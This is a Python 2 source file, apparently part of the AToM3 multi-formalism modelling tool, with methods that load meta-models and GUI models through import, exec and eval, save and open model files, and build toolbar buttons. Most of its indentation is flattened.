self.ConnectivityMap = {}
def loadGUImodel(self, file):
"""
Loads a model of the GUI in the 'Buttons' formalism. Returns this graph.
"""
oldGraphics = self.genGraphics
    self.genGraphics = 0 # disable graphics for a while...
if( file in sys.modules.keys()): # file has already been loaded
del sys.modules[file]
#exec "from "+file+" import *\n" in self.__dict__, self.__dict__
exec "import "+file
GUImodelDictionary = eval( file+'.__dict__' )
# Get the AToM3 version that generated the buttons model
if( GUImodelDictionary.has_key( 'atom3version' ) ):
version = GUImodelDictionary[ 'atom3version' ]
else:
version = None
# if we have the meta-model name
if( GUImodelDictionary.has_key( 'loadedMMName' ) ):
self.loadedMMName = GUImodelDictionary[ 'loadedMMName' ]
if( self.loadedMMName == 'Buttons_META' ):
self.loadedMMName = "Buttons"
if self.loadedMMName != "Buttons": # This should be a 'Buttons' model
tkMessageBox.showerror(
"Couldn't open Formalism!",
"Selected file "+self.metaModelName
+" does not contain a valid formalism (loadedMMName != Buttons)"
+"\n" + self.debug(),
parent = self
)
return
# Create a 'Buttons' root node
from ASG_Buttons import ASG_Buttons
buttonsRoot = ASG_Buttons(self)
del self.loadedMMName
# Do we have a newfunction???
if( GUImodelDictionary.has_key( 'newfunction' ) ):
self.newfunction = GUImodelDictionary[ 'newfunction' ]
else:
tkMessageBox.showerror(
"Couldn't open Formalism!",
"Selected file "+file+" does not contain a valid GUI model"
+"\nMissing a newfunction method\n" + self.debug()
,parent = self
)
return
# look for newly defined or loaded types (loadedTypes should be a list)
if( GUImodelDictionary.has_key( 'loadedTypes' ) ):
self.genGraphics = 1
self.loadTypes( GUImodelDictionary['loadedTypes'] ) # load the new types...
self.genGraphics = 0
try:
if( version != None ):
self.newfunction(self, buttonsRoot, ButtonsRootNode=buttonsRoot)
else:
self.newfunction(self, buttonsRoot)
except TypeError:
tkMessageBox.showerror(
"Couldn't open Formalism!",
"Selected file "+file+" does not contain a valid GUI model"
+"\nTypeERROR encountered\n" + self.debug()
,parent = self
)
raise
return
else:
tkMessageBox.showerror(
"Couldn't open Formalism!",
"Selected file "+file+" does not contain a valid GUI model\n"
+"LoadedMMName not found in dict, import problem...\n"
+ self.debug()
,parent = self
)
return
self.genGraphics = oldGraphics # restore graphics
return buttonsRoot
def openMetaModel(self, GUIModel = None, merge = 1, createNewRoot = 1,
fileName = None, printToConsole=True, printToConsoleIndent=''):
"""
    Opens a meta-model, adding its information to the previously opened ones
    (if merge == 1). If GUIModel is None, a dialog box asks for the name.
    GUIModel is the name of the GUI model to be opened prior to the meta-model.
"""
historyName = None
if( GUIModel == None):
if( not fileName ):
text = "Please choose the starting directory for the file dialog\n"
text += "Last/Default dir is: " + self.initialDirectoryDict[ 'OpenMetaModel' ]
openDialog = Dialog.Dialog(None, {'title': 'Opening Formalism',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Central Formalism Dir','User Formalism Dir','Last/Default Dir', 'Cancel')})
if( openDialog.num == 0 ):
initialDir = META_MODEL_PATH
elif( openDialog.num == 1 ):
initialDir = USER_MMODEL_PATH
elif( openDialog.num == 2 ):
initialDir = self.initialDirectoryDict[ 'OpenMetaModel' ]
else:
return
fileName = tkFileDialog.askopenfilename(title='Open Formalism/Meta-Model',
filetypes=[("Meta-Model files", "*_META.py"),
("Python files", "*.py")],
initialdir=initialDir )
# File dialog was cancelled
if( not fileName): return
# Save the directory for next openMetaModel operation
else:
# Get the path for fileName, which is a subdirectory of a Formalism dir
# So then get the Formalism dir itself, if possible, and save that
newPath = os.path.dirname( fileName )
if( newPath ): newPath = os.path.dirname( newPath )
self.initialDirectoryDict[ 'OpenMetaModel' ] = newPath
dir, file = os.path.split(fileName)
# Add the directory to the sys.path
self.checkInSearchPath( dir )
className = string.split (file, ".") # compose class name
self.GUIModelName = className[0]
historyName = fileName
# Make sure we can find the GUIModel
elif( self.addDirectoryWithModelName(GUIModel, noWarning = True ) ):
self.GUIModelName = GUIModel
# Uh oh, we couldn't find the GUIModel
else:
# If a model is "upgraded" to the new AToM3, the Meta-model name
# changes from "metaname.py" to "metaname_META.py"
# So lets check for this as well
if( GUIModel[-8:] != '_META.py' ):
pathExtTuple = os.path.splitext( GUIModel )
GUIModel = pathExtTuple[0] + '_META' + pathExtTuple[1]
if( self.addDirectoryWithModelName( GUIModel ) ):
self.GUIModelName = GUIModel
else:
return # Nothing worked, give it up
# Wait a sec, is the meta-model already loaded!?!?!
if(self.ASGroot and self.ASGroot.getASGbyName(self.GUIModelName)):
print 'WARNING: Attempt to load formalism', self.GUIModelName, \
'a second time was blocked in', __file__
return
if( printToConsole ):
t = time.time()
#print "-----------------------------------------------------------"
print printToConsoleIndent + "Meta-Model: " + self.GUIModelName
setCursor( self.parent, 'Busy' )
# Check if newly added paths are causing problems
self.sourcePathConflictAwareness()
GUIModel = self.loadGUImodel(self.GUIModelName) # load the GUImodel
if GUIModel == None:
setCursor( self.parent, 'Default' )
return
# retrieve some elements of the GUI...
fileName = GUIModel.Formalism_File.toString() # File where the meta-model is stored.
dir, file = os.path.split(fileName) # split directory and file name
className = string.split (file, ".") # split file name and extension
self.metaModelName = className[0] # store the name of the file
##print '_META file name', self.GUIModelName
##print '_MM file name', self.metaModelName
if not self.ASGroot and not self.editGGLabel: # DO NOT DO THIS IF WE ARE A CHILD WINDOW (THAT IS A gg RULE)
if self.metaModelName in sys.modules.keys(): # file has already been loaded
del sys.modules[self.metaModelName]
if( self.metaModelName == '' ):
print 'Cannot open a meta-model with no name!'
return
try:
exec "from "+self.metaModelName+" import *\n" in self.__dict__, self.__dict__
except ImportError:
print "MetaModel "+self.metaModelName+" could not be found... Aborting"
setCursor( self.parent, 'Default' )
raise
## self.quit()
## sys.exit(1)
except AttributeError:
print "File "+self.metaModelName+" is not a valid meta-model... Aborting"
setCursor( self.parent, 'Default' )
raise
## self.quit()
## sys.exit(1)
# If we already have a menu, add to it
if( self.__dict__.has_key( 'modelMenu' ) ):
self.modelMenu.add_separator()
self.createModelMenu(self, self.modelMenu )
else:
self.parent.config(menu=None) # eliminate old menu
buildAllMenus(self) # Creates a topLevel menu
self.configureUserActions()
self.setConnectivity(self)
if self.console: self.console.appendText('Opening Formalism '+self.metaModelName)
# delete buttons (if the metamodel they represent is not needed...) and then add the new ones
if not merge:
if self.buttonList != []:
for bt in self.buttonList:
if not self.__buttonsNeeded(bt):
try:
bt.pack_forget()
self.buttonList.remove(bt)
del bt
except AttributeError:
buttons = list(bt)[3:]
for b in buttons:
b.pack_forget()
del b
self.buttonList.remove(bt)
# self.toolBar.pack_forget()
oldASGroot = self.ASGroot # keep old instance of ASGroot
newASGroot = self.createNewASGroot(self) # make a new instance of ASG
# Add the buttons to the toolbar
self.addButtons2ToolBar(GUIModel)
if( merge and oldASGroot): # if we have to merge...
self.ASGroot.merge(newASGroot )
elif( not oldASGroot): # if we did not have an ASGroot
self.ASGroot = newASGroot
# Restore old ASG if we did not have to create a new one
if( createNewRoot == 0 and oldASGroot != None):
self.ASGroot = oldASGroot
# Now lets track the new attributes
self.ASGroot.trackNewASGroot( newASGroot, self.GUIModelName )
# Put the name on the title bar
self.putMetaModelName()
# Recently used files history tracker
if( historyName ):
self.historyManager( self.LASTOPEN_MMODEL, historyName )
# Map *_MM classnames to the *_META classnames
self.openGUI_ModelDict[ self.metaModelName ] = self.GUIModelName
setCursor( self.parent, 'Default' )
if( printToConsole ):
print printToConsoleIndent+" loaded in %0.3f seconds" % ( time.time() - t )
#print "-----------------------------------------------------------\n"
def getOpenMetaModelsList( self, getAllModels=False ):
"""
Returns a list of the *_META classnames that can be used to open a formalism.
You'll notice that this is just a great big ugly hack and is no longer used.
By Denis Dube :D
"""
raise Exception, 'getOpenMetaModelsList is still being used, DANGIT!!! Send mayday to d3n14@yahoo.com'
'''
openModelStringList = []
numOpenMetaModels = len( self.openMetaModels.getValue() )
if( numOpenMetaModels > 1 or getAllModels ):
for i in range( 0, numOpenMetaModels ):
# Get the name of the file where the meta-model is stored
d, trueMMname = os.path.split( self.buttonList[i][2] )
# Remove the .py extension
trueMMname = trueMMname[:len(trueMMname)-3]
if( self.openGUI_ModelDict.has_key( trueMMname ) ):
openModelStringList.append( self.openGUI_ModelDict[ trueMMname ] )
else:
print "ERROR: " + trueMMname + " not found in open-meta-model dict"
return []
return openModelStringList
'''
def save (self, export = 0, fileName = None):
"""
Saves the model to disk
"""
# try the global constraints...
res = self.ASGroot.preCondition(ASG.SAVE) # evaluate global pre-conditions
if res: return self.constraintViolation(res) # if violated, show warning and do not save
# try the local constraints...
res = self.ASGroot.evaluateLocalPreCondition(ASG.SAVE) # evaluate local pre-conditions
if res: return self.constraintViolation(res) # if violated, show warning and do not save
res = self.checkModel()
if res: return self.constraintViolation(res) # if violated, show warning and do not save
#todo: add choice
# Do we even have a fileName? If not, we must harass the user...
if( not fileName or (fileName == "Nonamed") ):
text = "Please choose the starting directory for the file dialog\n"
text += "Last/Default dir is: " + self.initialDirectoryDict[ 'OpenSaveModel' ]
openDialog = Dialog.Dialog(None, {'title': 'Saving Model',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Central Models','Central Formalisms','Last/Default',
'User Models','User Formalisms','Cancel')})
if( openDialog.num == 0 ):
initialDir = MODEL_PATH
elif( openDialog.num == 1 ):
initialDir = META_MODEL_PATH
elif( openDialog.num == 2 ):
initialDir = self.initialDirectoryDict[ 'OpenSaveModel' ]
elif( openDialog.num == 3 ):
initialDir = USER_MODEL_PATH
elif( openDialog.num == 4 ):
initialDir = USER_MMODEL_PATH
else:
return
# Save As Dialog
fileName = tkFileDialog.asksaveasfilename(
filetypes=[("Model files", "*_MDL.py"),
("Python files", "*.py"),("All files","*")],
initialdir=initialDir )
if( not fileName): return # File dialog was cancelled
setCursor( self.parent, 'Busy' )
# ER model naming convention: file name finishes with '_ER_MDL'
models = self.openMetaModels.getValue()
ERModelNames = [ 'Entity Relationship', 'EntityRelationshipV3' ]
if( len( models ) == 1 and models[0].getValue() in ERModelNames ):
if( not re.search( '\w*_ER_MDL', fileName ) ):
fileName = os.path.splitext( fileName )[0] #string.split( fileName, '.' )[0]
fileName += '_ER_MDL.py'
# Add the ER model to the sys.path if not already,
# since the modeler may want to generate code
ERmodelPath = os.path.split( fileName )[0]
self.checkInSearchPath( ERmodelPath )
# Python source code must always have its .py extension...
if( fileName[-3:] != '.py' ):
# Does it have the "Model" extension?
if( fileName[-4:] == '_MDL' ):
fileName += '.py'
else:
fileName += '_MDL.py'
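# Illustrative examples of the extension normalization above:
#   'traffic'      -> 'traffic_MDL.py'
#   'traffic_MDL'  -> 'traffic_MDL.py'
#   'traffic.py'   -> left unchanged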
# See if file exists:
if os.path.exists(fileName): # file exists!!
# see if back already exists...
backupFilename = fileName + ".back"
if os.path.exists( backupFilename ): # backup file exists!!
os.remove( backupFilename ) # remove it first
try:
os.rename( fileName, backupFilename )
except:
print "ERROR: Failed to create backup file due to cruel and unusual bug"
# Store all the open meta-models to make this a truly Multi-Formalism system :D
# NOTE: Old AToM3 builds won't have a clue what this means!!!
#openModelStringList = self.getOpenMetaModelsList()
openModelStringList = self.ASGroot.getEntireASGList()
# Call the ASG method to save its contents
self.ASGroot.genCode(fileName, self.types, self.genGraphics, 1,
self.GUIModelName, export, self.newTypes,
openModelStringList=openModelStringList,
attrGenFix=True )
# Update status bar information...
self.statusbar.event(StatusBar.MODEL, StatusBar.SAVE, fileName)
if self.console: self.console.appendText('Saving model in file '+fileName)
# Recently used files history tracker
self.historyManager( self.LASTOPEN_MODEL, fileName )
# Save the directory for next Open or Save operation
self.initialDirectoryDict[ 'OpenSaveModel' ] = os.path.dirname( fileName )
setCursor( self.parent, 'Default' )
def checkInSearchPath(self, dir):
"""
checks if the given directory is in the Python search path.
If this is not the case, it adds the directory to the path
Method simplified by Denis Dube, July 26, 2004 because all
the sys paths are now in absolute form.
"""
dir = os.path.normpath( dir )
# Windows thinks capitalization doesn't matter...
if( sys.platform == 'win32' ):
capitalDir = dir.upper()
for path in sys.path:
if( capitalDir == path.upper() ):
return False
# Linux knows caps make a difference :D
else:
if( dir in sys.path ):
return False
sys.path.append(dir)
return True
def openModelErrorDialog(self, model='N/A'):
"""
Indicate exactly what went wrong and allow user to reset AToM3 paths
"""
from SimpleDialog import SimpleDialog
myText = ''
myText += 'Unable to automatically load the model\'s formalism: "'
if( model[-5:] == '_META' ): model = model[:-5]
myText += model + '"\n\n'
myText += 'Please make sure the formalism directory is located in ONE of the '
myText += 'following two directories:\n\n'
myText += META_MODEL_PATH + '\n'
myText += USER_MMODEL_PATH
myText += '\n\nExamples:\n'
myText += 'Valid: ~\User Formalisms\X\X_META.py\n'
myText += 'Invalid: ~\User Formalisms\X_META.py\n'
myText += 'Invalid: ~\User Formalisms\X\X\X_META.py'
d = SimpleDialog(self.parent, text=myText,
buttons=['Ok I will try that', 'Still not working? Click here to reset paths (Closes AToM3)'],
default=0,
title="ERROR loading model: " + model)
if(d.go() == 1):
from uninstall import uninstall
uninstall(useDialogs=False)
tkMessageBox.showinfo( "Paths Reset",
"Paths have been reset, shutting down AToM3",
parent = self )
try:
self.console.destroy()
except:
pass # So what? Won't lose any sleep over this
try:
self.debugConsole.destroy()
except:
pass # Ditto for the debug console
self.parent.update()
self.parent.destroy()
self.parent.update()
sys.exit(1)
setCursor( self.parent, 'Default' )
return False
def open (self, fileName = None, printToConsole=True ):
"""
opens a model from disk
"""
if( not fileName ):
text = "Please choose the initial file dialog directory\n\n"
text += "Last/Default dir is: \n" + self.initialDirectoryDict[ 'OpenSaveModel' ]
openDialog = Dialog.Dialog(None, {'title': 'Opening Model',
'text': text,
'bitmap': '',
'default': 0,
'strings': ('Central Models','Central Formalisms','Last/Default',
'User Models','User Formalisms','Cancel')})
if( openDialog.num == 0 ):
initialDir = MODEL_PATH
elif( openDialog.num == 1 ):
initialDir = META_MODEL_PATH
elif( openDialog.num == 3 ):
initialDir = USER_MODEL_PATH
elif( openDialog.num == 4 ):
initialDir = USER_MMODEL_PATH
elif( openDialog.num == 2 ):
initialDir = self.initialDirectoryDict[ 'OpenSaveModel' ]
else:
return
fileName = tkFileDialog.askopenfilename(filetypes=[
("Model files", "*_MDL.py"),("Button Models", "*_META.py")
,("Python files", "*.py")],
initialdir=initialDir)
# File dialog was cancelled
if( not fileName): return
# Save the directory for next Open or Save operation
self.initialDirectoryDict[ 'OpenSaveModel' ] = os.path.dirname( fileName )
setCursor( self.parent, 'Busy' )
self.parent.update()
if( not os.path.exists( fileName ) ):
tkMessageBox.showerror( "File Not Found ",
"ATOM3.open() could not find:\n\n" + fileName,
parent = self )
setCursor( self.parent, 'Default' )
return
dir, file = os.path.split(fileName)
if( printToConsole ):
t = time.time()
#print "***********************************************************\n"
print "\nLoading model: ", file[:-3]
# Let's find out which meta-model this model was made with (search the file line by line)
f = open( fileName , 'r' )
model = None
isModelAList = False
for line in f:
# Look for a string with the meta-model name
match = self.LOADED_MM_PATTERN.search( line )
if( match ):
model = match.group(1)
break
# Look for a list with the meta-model names
match = self.LOADED_MM_LIST_PATTERN.search( line )
if( match ):
stringLine = match.group()
exec( stringLine )
isModelAList = True
break
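# NOTE (assumed saved-model format): the patterns above are expected to match
# lines assigning either a single meta-model name or a list of names, e.g.
#   loadedMMName = 'DCharts_META'
#   loadedMMName = ['DCharts_META', 'Annotation_META']
# The exact regexes live in self.LOADED_MM_PATTERN / self.LOADED_MM_LIST_PATTERN.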
#print 'Meta-model: ', model, '== "LIN_FUN_V0_META":', model == 'LIN_FUN_V0_META'
# Add the source path corresponding to each model in the list
if( isModelAList ):
for model in loadedMMName:
if( not self.addDirectoryWithModelName( model, noWarning = True ) ):
tkMessageBox.showerror( "Open model error",
"Could not find the following meta-model: "
+str(model)+"\n\nSince the model you are "+
"attempting to load requires that "+
"meta-model, AToM3 will now abort." ,
parent=self)
return
# No model at all found in the file...
elif( not model ):
dir = self.openModelErrorDialog( 'unknown meta-model' )
# Add the source path corresponding to the single model string
elif( not self.addDirectoryWithModelName( model, noWarning = True ) ):
# If a model is "upgraded" to the new AToM3, the Meta-model name
# changes from "metaname.py" to "metaname_META.py"
# So let's check for this as well
if( model[-8:] != '_META.py' ):
pathExtTuple = os.path.splitext(model)
model = pathExtTuple[0] + '_META' + pathExtTuple[1]
if( not self.addDirectoryWithModelName( model, noWarning = True ) ):
# Everything failed, ask the user to find the meta-model...
dir = self.openModelErrorDialog(model)
if( not dir ): return
className = string.split (file, ".") # compose class name
self.newfunction = None
if className[0]:
self.checkInSearchPath(dir)
# first check if it has been loaded before, to force a recompilation
if className[0] in sys.modules.keys(): # file has already been loaded
del sys.modules[className[0]]
# delete to force a reload
# Load the model from the file, new method (Doesn't contaminate local namespace)
try:
exec "import "+className[0]+"\n"
except:
tkMessageBox.showerror("Error", "Could not open model, importation problem" )
raise
# Load newfunction (name of the method which loads the saved model)
try:
newfunction = eval( className[0] + '.newfunction' )
except:
tkMessageBox.showerror("Error", "Could not open model, newfunction attribute not found" )
print className[0] + '.newfunction'
raise
# Load meta-model environments required for this model to load
try:
loadedMMName = eval( className[0] + '.loadedMMName' )
except:
loadedMMName = None
# Load any special types required by this model
try:
typeInfoList = eval( className[0] + '.loadedTypes' )
except:
typeInfoList = []
try:
self.loadTypes(typeInfoList)
except:
print '\nERROR: AToM3.open() is unable to load the types defined in',
print 'the model:', typeInfoList
print '\nAs a quick fix: edit the *_MDL.py file (end part) and remove',
print 'the line starting with "loadedTypes = "'
print '\nThe raw error message will now be raised',
print '(and AToM3 will close ungracefully):\n'
raise # <-- You can remove this if you want, it IS informative though
# Load the AToM3 version that saved this model
try:
version = eval( className[0] + '.atom3version' )
except:
version = '0.2.2'
# List of meta-models to load (needed for this model)
if( type( loadedMMName ) == type( list() ) ):
#todo: warn loading
for loadName in loadedMMName:
# No meta-model open, just open this new meta-model
if( not self.ASGroot):
self.openMetaModel( loadName, 0, 1,
printToConsole=printToConsole,
printToConsoleIndent=' ')
# No non-root secondary meta-model open by that name
elif( not self.ASGroot.getASGbyName( loadName ) ):
self.openMetaModel(loadName, 1, 0,
printToConsole=printToConsole,
printToConsoleIndent=' ')
# Single meta-model to load (needed for this model)
elif( type( loadedMMName ) == type( str() ) ):
# No meta-model open, just open this new meta-model
if( not self.ASGroot):
self.openMetaModel( loadedMMName, 0, 1,
printToConsole=printToConsole, printToConsoleIndent=' ')
# No non-root secondary meta-model open by that name
elif( not self.ASGroot.getASGbyName( loadedMMName ) ):
self.openMetaModel(loadedMMName, 1, 0,
printToConsole=printToConsole, printToConsoleIndent=' ')
loadedMMName = [loadedMMName] # Make this a list for later...
# No Meta-Model? WTF? Abort!
else:
raise Exception, 'Could not load model, no meta-model name found'
#print "Running newfunction of model to be opened ", newfunction
setCursor( self.parent, 'Busy' )
self.isLoadingModel = True
#todo: if N formalisms, then N root nodes
if( version == '0.3' ):
#allASGnames = self.ASGroot.getEntireASGList()
allASGlist = []
for name in loadedMMName:
ASG = self.ASGroot.getASGbyName(name)
if( ASG ): allASGlist.append( ASG )
else: print "\n\nUh oh! This is *not* good...",loadedMMName
newfunction(self, self.ASGroot, *allASGlist )
else:
newfunction(self, self.ASGroot)
self.isLoadingModel = False
# if we have loaded successfully a file, then update status bar...
self.statusbar.event(StatusBar.MODEL, StatusBar.LOAD, fileName) # update status bar
if self.console: self.console.appendText('Loading model from file '+fileName)
# Optimize the loaded model
#selectAllVisibleObjects( self )
#optimizeConnectionPorts( self )
self.cb.highlighter(0)
self.cb.clearSelectionDict()
# For QOCA constraints... See ASG.processLoadedLinkNodes() for more
self.ASGroot.processLoadedLinkNodes(True)
# Sometimes after loading a large model AToM3 takes a break
# But there are no unpaid breaks now! Ahahaha. Haha. Bah.
self.parent.update()
# Recently used files history tracker
self.historyManager( self.LASTOPEN_MODEL, fileName )
if( printToConsole ):
print "Model %s opened in %0.3f seconds" % (file[:-3], time.time() - t )
#print "***********************************************************\n"
setCursor( self.parent, 'Default' )
def isATOM3LoadingModel(self):
""" Can be handy to know this... """
return self.isLoadingModel
def exitFromATOM3(self, unUsed = None, noDialog=False):
"""
Exits from the current ATOM3 instance
Returns True if it really exited, and False if the user chickened out.
"""
if self.IsMainKernel:
# check status, and if we have not saved, present a message...
st, fl = self.statusbar.getState(StatusBar.MODEL)
if(fl):
lastFile = fl[0]
print '\nQuick start AToM3 with last model (E-mail denkkar@gmail.com if not working on Linux):'
lastFile = string.replace(lastFile, '\\\\', '/')
print 'atom3nosplash.py ' + lastFile#string.replace(lastFile, '\\', '\\\\')
if(st == StatusBar.MODIFIED and not noDialog):
if( fl ):
filename = fl[0]
else:
filename = "unknown"
saveDialog = Dialog.Dialog(None, {'title': 'Model Modified',
'text':
'"'+str(filename)+'"'
' has been modified since the last time it was saved.'
'\n\nDo you want to save it before exiting the application?',
'bitmap': '',
'default': 0,
'strings': ('Save Model','Discard Changes','Return to AToM3')})
# Return to editor
if( saveDialog.num == 2 ):
return False
# Save changes
elif( saveDialog.num == 0 ):
if fl != 'Nonamed': self.save(0, fl[0]) # Quick save
else: self.save(0) # Full save dialog
# Save initial directories
self.optionsDatabase.set(self.LAST_INITIAL_DIRS, self.initialDirectoryDict)
if( self.optionsDatabase.saveOptionsDatabase() == True ):
doTempCleanupALL() #<-- REMOVE ALL TEMP FILES!
else:
try:
doTempFileCleanup() #<--- Remove temporary Undo & Copy files...
doTempCleanupChoice() # <-- and other temp files....
except:
pass
#self.optionsDatabase.releaseOptionLock() #<--- Let others be able to save options
try:
self.console.getRootTK().destroy()
except:
pass # So what? Won't lose any sleep over this
try:
self.debugConsole.getRootTK().destroy()
except:
pass # Ditto for the debug console
self.parent.destroy()
#self.quit()
#sys.exit(1)
else:
# self.destroy()
self.parent.destroy()
return True
def addButtons2ToolBar (self, GUIModel):
"""
Adds the buttons to the toolbar. The specific buttons (that must be created here on the fly) of
the meta-model are in the GUIModel.
"""
formalismName = GUIModel.Formalism_Name.toString() # 'User-friendly' name of the formalism
# Buttons per row: use the meta-model's value if there isn't a global override in effect
rowSize = self.optionsDatabase.get(self.BUTTONS_PER_ROW)
if( rowSize <= 0 ):
rowSize = GUIModel.RowSize.getValue()
formalismFile = GUIModel.Formalism_File.toString() # meta-model file
fName = string.replace(formalismName, " ", "_")
mmToolBar = Frame(self.toolBar, relief = RAISED)
b = Label(mmToolBar, text = formalismName, fg="darkgreen",
bg="white", font = ("Helvetica",10), relief = GROOVE, padx=1)
b.pack(side = TOP, fill = X, ipady = 2)
self.openMetaModels.newItem(ATOM3String(formalismName))
metaModelInfo = [mmToolBar, formalismName, formalismFile]
auxPanel = Frame(mmToolBar, relief = GROOVE)
counter = 0
def findImageFile( fileName ):
""" Finds the image by looking in all dirs with Formalisms """
filePath = os.path.normpath( os.path.join( META_MODEL_PATH,
os.path.normpath( fileName ) ) )
#print 'filePath', filePath
if( os.path.exists( filePath ) ): return filePath
filePath = os.path.normpath( os.path.join( USER_MMODEL_PATH,
os.path.normpath( fileName ) ) )
if( os.path.exists( filePath ) ): return filePath
filePath = os.path.normpath( os.path.join( SOURCE_CODE_PATH,
os.path.normpath( fileName ) ) )
if( os.path.exists( filePath ) ): return filePath
return None
# Important Notice: To correctly create buttons with images, we have to create
# a different attribute name for each...
# imgAttrName = "ImgButton"
for node in GUIModel.listNodes['ButtonConfig']: # for each 'ButtonConfig' in the model...
text = 1
if node.Contents.lastSelected == 'Text': # check if we should put a text in the button
buttonText = node.Contents.Text.toString() # get the button text...
elif node.Contents.lastSelected == 'Image':
text = 0
buttonImageFileName = findImageFile( node.Contents.Image.toString() )
if( not buttonImageFileName ):
text = 1
buttonText = node.Contents.Image.toString()
if( not text ):
self.buttonImage.append(PhotoImage(file = buttonImageFileName))
self.numImg = self.numImg+1
newDrawingMode = node.Drawing_Mode.getValue()[1] # see if we have to create a new mode
name, lang, kind, act, code = node.Action.getValue() # Unwrap action...
"""
#if newDrawingMode:
functionName = fName+str(counter) # compose function name
# see if the function is present yet
if( not functionName in self.__dict__.keys() ):
functionHeader = "def "+functionName+"(self, wherex, wherey ):\n" # compose function header
functionBody = " " +string.replace(code,'\n', '\n ')+"\n" # compose function body
# Path to a temp file (make sure it's empty)
path = os.path.split( __file__ )[0]
path = os.path.join( path, 'temporaryFILE923.py' )
if( os.path.exists( path ) ): os.remove( path )
# Open the temp file and create our method...
tempFile = open( path, 'w')
tempFile.write( functionHeader + functionBody )
tempFile.close()
# Make sure an earlier method is not in memory...
if( sys.modules.has_key( 'temporaryFILE923' ) ):
del sys.modules['temporaryFILE923']
import temporaryFILE923
# Cleanup temp files
try:
if( os.path.exists( path ) ): os.remove( path )
if( os.path.exists( path+'c' ) ): os.remove( path+'c' )
except:
pass
# Extract our compiled method
if( temporaryFILE923.__dict__.has_key(functionName) ):
self.__dict__[functionName] = temporaryFILE923.__dict__[functionName]
method = self.__dict__[functionName] # obtain a reference to the method
newMode = "NEWMODE"+fName+str(counter) # create a new Mode for the button
if not node.Drawing_Mode.getValue()[1]: # Is it a method 2b executed right away? (added 27 July 2002, JL)
newMode = newMode+"&&EXEC" # This distinguishes the executable modes (added 27 July 2002, JL)
self.userActionsMap[newMode] = method # set the userACtionsMap dictionary
"""
#if newDrawingMode:
functionName = fName+str(counter) # compose function name
# see if the function is present yet
if not functionName in self.__dict__.keys():
functionHeader = "def "+functionName+"(self, wherex, wherey ):\n" # compose function header
functionBody = " " +string.replace(code,'\n', '\n ')+"\n" # compose function body
#todo: BAD CODE
# This generates a Syntax Warning whenever a from x import * statement occurs
# This really should not have been necessary!!!
# Fix idea: save the method to a file, then load the file; not sure if that would work though...
# Why it's bad: http://www.python.org/doc/2.2.3/whatsnew/node9.html
exec functionHeader+functionBody in self.__dict__, self.__dict__ # 'create' new method
method = self.__dict__[functionName] # obtain a reference to the method
newMode = "NEWMODE"+fName+str(counter) # create a new Mode for the button
if not node.Drawing_Mode.getValue()[1]: # Is it a method 2b executed right away? (added 27 July 2002, JL)
newMode = newMode+"&&EXEC" # This distinguishes the executable modes (added 27 July 2002, JL)
self.userActionsMap[newMode] = method # register it in the userActionsMap dictionary
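# Sketch of what the exec above produces for, say, counter == 0 and a
# formalism named 'DCharts' (illustrative, names are hypothetical):
#   def DCharts0(self, wherex, wherey):
#       <button action code, indented one level>
# The method is then registered under mode 'NEWMODEDCharts0', with an
# '&&EXEC' suffix when it must run immediately instead of changing mode.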
if text:
newButton = Button(auxPanel, text = buttonText,
bg="white", activebackground="white" )
else:
newButton = Button(auxPanel,
image = self.buttonImage[self.numImg],
bg="white", activebackground="white" )
self.modes[newButton] = newMode # set the bind newButton->changeMode
newButton.bind("<ButtonRelease-1>", self.changeMode)
# Proof of concept: could have a window popup up with help info...
# This stuff merely makes passing a cursor over a button VERY obvious
def handler( event, button = newButton ):
button.configure( bg='firebrick2', activebackground='SpringGreen2',
borderwidth=2, relief='groove' )
newButton.bind( '<Enter>', handler)
def handler( event, button = newButton ):
button.configure( bg='white', activebackground='white',
borderwidth=2, relief='raised' )
newButton.bind( '<Leave>', handler)
# This makes the right mouse button behave just like the left mouse button
def modelButtonPress3( button ):
button.configure( relief = "sunken" )
def modelButtonRelease3(self,event,button):
button.configure( relief = "raised" )
self.changeMode(event)
newButton.bind("<Button-3>",
lambda event,n=newButton: modelButtonPress3(n) )
newButton.bind("<ButtonRelease-3>",
lambda event,n=newButton,s=self: modelButtonRelease3(s,event,n) )
newButton.pack(side=LEFT, padx=2)#, pady=2, fill=X, expand=1)
counter = counter + 1
if(counter % rowSize == 0): # check if we have rowSize elements in the row
auxPanel.pack(side=TOP)#, ipady=10, ipadx=10)
auxPanel = Frame(mmToolBar, relief = GROOVE)
metaModelInfo.append(newButton)
self.buttonList.append(tuple(metaModelInfo))
auxPanel.pack(side=TOP, fill=X)#, ipady=20)
emptyPanel = Frame(mmToolBar)
emptyPanel.pack(side=BOTTOM, fill=Y, expand=1)
mmToolBar.pack(side=LEFT, fill=Y)
# To push the buttons to the top of the panel, put an empty frame
# in the bottom.
#emptyPanel = Frame(self.toolBar, bg="black")
#emptyPanel.pack(side=BOTTOM, fill=BOTH,expand=1)
# Toolbar items may have changed
self.parent.update()
self.configureToolbar()
#....................................................
def chooseLinkType(self, listOfLinks):
""" Function that presents a dialog box to choose a link type
- listOfLinks: is a list of tuples (<class-name>, <method-2-create-instance-of-class>)
- returns the tuple that's been selected
"""
# first we create a list of ATOM3Strings using the first component of the tuples...
if( 0 ):
A3StringList = []
for link in listOfLinks:
ns = ATOM3String(link[0])
A3StringList.append(ns)
# create an ATOM3List of Strings with the initial value set to the previous list
atl = ATOM3List([0,0,0,0], ATOM3String)
atl.setValue(A3StringList)
# Present the previous list in a dialog box
dlb = ATOM3TypeDialog(self, atl)
if dlb.result_ok:
return listOfLinks[dlb.widget.lastSelection]
# Popup menus are more l33t :D
else:
stringList = []
for link in listOfLinks:
stringList.append( link[0] )
title = 'Link Type'
actionLabel = 'Select'
index = self.popupMenuCreator.listChoicePopup( title,stringList,actionLabel )
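# listChoicePopup returns 0 when no valid choice was made, otherwise the
# 1-based index of the selection (hence the index-1 lookup below).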
# Unacceptable result, must have a valid choice or exception will occur
if( index == 0 ): return self.chooseLinkType( listOfLinks )
return listOfLinks[ index-1 ]
def modelAttributes(self, metaModelASG = None ):
"""
Edits model attributes, including global constraints...
Can handle multiple meta-models at once.
"""
# User provides a specific ASG to edit...
if( metaModelASG ):
val = ATOM3TypeDialog(self, metaModelASG )
# Now we know when the user has finished editing the ASG options
metaModelASG.postCondition (ASGNode.EDIT)
# We'll try and figure out which ASG to edit...
else:
self.ASGroot.showASGattributesDialog( self )
# Now we know when the user has finished editing the ASG options
self.ASGroot.postCondition (ASGNode.EDIT)
return
#todo: site of a major hack
"""
metaModelASG = self.ASGroot
if( metaModelASG.mergedASG ):
